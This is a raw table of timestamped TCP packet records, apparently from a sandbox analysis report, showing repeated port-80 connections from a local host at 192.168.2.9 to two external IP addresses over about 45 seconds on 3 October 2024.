                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.338980913 CEST497388041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.339133978 CEST80414973880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.339188099 CEST497388041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.341387987 CEST497388041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.342041969 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.346172094 CEST80414973880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.346959114 CEST80414973980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.347032070 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.352097034 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:46.357033014 CEST80414973980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.073749065 CEST80414973980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.073944092 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.074002981 CEST80414973980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.074151993 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.074287891 CEST497398041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.074774981 CEST497408041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.080369949 CEST80414973980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.080384016 CEST80414974080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.080466032 CEST497408041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.080585003 CEST497408041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.086080074 CEST80414974080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:47.086141109 CEST497408041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.131696939 CEST497308041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.136930943 CEST80414973082.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.136986017 CEST497308041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.144565105 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.149528027 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.149621964 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.149828911 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.154691935 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.763123035 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.763212919 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.788875103 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.789908886 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.793746948 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:49.794836998 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:50.055955887 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:50.056077957 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.085721970 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.091177940 CEST80414974380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.091293097 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.091733932 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.096808910 CEST80414974380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.703495979 CEST80414974380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.703896046 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.703954935 CEST80414974380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.703969955 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.704330921 CEST497438041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.704334021 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.708905935 CEST80414974380.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.709211111 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.709382057 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.709665060 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:51.714553118 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.371779919 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.371867895 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.372150898 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.372267962 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.372314930 CEST497448041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.372529984 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.376986027 CEST80414974480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377474070 CEST80414974580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377549887 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.377686977 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.382755995 CEST80414974580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:52.382805109 CEST497458041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.461200953 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.466178894 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.466253996 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.475544930 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:56.480364084 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128494024 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128561974 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128752947 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128796101 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.128864050 CEST497468041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.129240036 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.134906054 CEST80414974680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135353088 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135416985 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.135732889 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.141911030 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771469116 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771528006 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771876097 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.771960974 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.772150040 CEST497478041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.772263050 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778678894 CEST80414974780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778826952 CEST80414974980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.778892994 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.779036045 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.786170959 CEST80414974980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:45:57.786223888 CEST497498041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.861843109 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.868472099 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.868624926 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.869337082 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:02.874131918 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.503974915 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.503992081 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504076958 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504342079 CEST497508041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.504704952 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.510943890 CEST80414975080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.510956049 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.511085987 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.511584044 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:03.517363071 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133115053 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133205891 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133243084 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133275032 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133625031 CEST497518041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.133996010 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.139954090 CEST80414975180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140238047 CEST80414975280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140455008 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.140574932 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.148073912 CEST80414975280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:04.148152113 CEST497528041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.168144941 CEST497348041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.173358917 CEST80414973482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.173455000 CEST497348041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.188766956 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.193706036 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.194183111 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.194183111 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.199099064 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.831279993 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.831933022 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.832174063 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.833590984 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.838254929 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:07.839843988 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.115828037 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.115880013 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.155819893 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.162040949 CEST80414975480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.162107944 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.162431002 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.168533087 CEST80414975480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793349981 CEST80414975480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793472052 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793718100 CEST80414975480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793735027 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.793776989 CEST497548041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.794034958 CEST497558041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.798496962 CEST80414975480.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.798832893 CEST80414975580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.798926115 CEST497558041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.799226999 CEST497558041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:08.804044008 CEST80414975580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.430943012 CEST80414975580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.431030035 CEST80414975580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.431118011 CEST497558041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.431405067 CEST497558041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.431749105 CEST497568041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.436321974 CEST80414975580.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.436681986 CEST80414975680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.436765909 CEST497568041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.436829090 CEST497568041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.442678928 CEST80414975680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:09.442737103 CEST497568041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:14.505708933 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:14.510535955 CEST80414975780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:14.510587931 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:14.510968924 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:14.516248941 CEST80414975780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.158838987 CEST80414975780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.159022093 CEST80414975780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.159060001 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.159099102 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.159410954 CEST497578041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.159806967 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.164201021 CEST80414975780.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.164598942 CEST80414975880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.164657116 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.164844990 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.169584990 CEST80414975880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787509918 CEST80414975880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787724018 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787808895 CEST80414975880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787904978 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.787931919 CEST497588041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.788285971 CEST497598041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.792655945 CEST80414975880.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.793128014 CEST80414975980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.793231010 CEST497598041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.793292999 CEST497598041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.798594952 CEST80414975980.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:15.799277067 CEST497598041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:19.820070028 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:19.824995995 CEST80414976080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:19.825082064 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:19.825392962 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:19.831120014 CEST80414976080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.444628000 CEST80414976080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.444886923 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.444907904 CEST80414976080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.444957972 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.445050955 CEST497608041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.445460081 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.450031042 CEST80414976080.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.450341940 CEST80414976180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.450400114 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.499744892 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:20.504709959 CEST80414976180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.075803041 CEST80414976180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.075934887 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.076189041 CEST80414976180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.076240063 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.076258898 CEST497618041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.076651096 CEST497628041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.081007957 CEST80414976180.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.081408978 CEST80414976280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.081476927 CEST497628041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.081557989 CEST497628041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.086733103 CEST80414976280.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:21.086792946 CEST497628041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.102231979 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.108048916 CEST80414974182.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.108135939 CEST497418041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.117518902 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.122415066 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.122490883 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.123045921 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.127852917 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.748054981 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.748238087 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.748840094 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.749891043 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.753746986 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:22.755480051 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:23.033117056 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:23.035422087 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.070446014 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.076049089 CEST80414975382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.076121092 CEST497538041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.083062887 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.091650963 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.091890097 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.092118025 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.100959063 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.821485996 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.823365927 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.830517054 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.831413031 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.835418940 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:26.836235046 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:27.124950886 CEST80414976482.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:27.125025034 CEST497648041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.163901091 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.164303064 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169008017 CEST80414976382.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169106960 CEST497638041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169258118 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169315100 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.169652939 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.174455881 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.768702984 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.768788099 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.769318104 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.774064064 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.808207989 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.814054012 CEST80414976582.115.223.39192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:28.814201117 CEST497658041192.168.2.982.115.223.39
                                                                                                                                                                                                                          Oct 3, 2024 20:46:30.871269941 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.031656981 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.034148932 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.035957098 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.040890932 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673386097 CEST80414976680.78.24.30192.168.2.9
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673466921 CEST497668041192.168.2.980.78.24.30
                                                                                                                                                                                                                          Oct 3, 2024 20:46:31.673999071 CEST497668041192.168.2.980.78.24.30
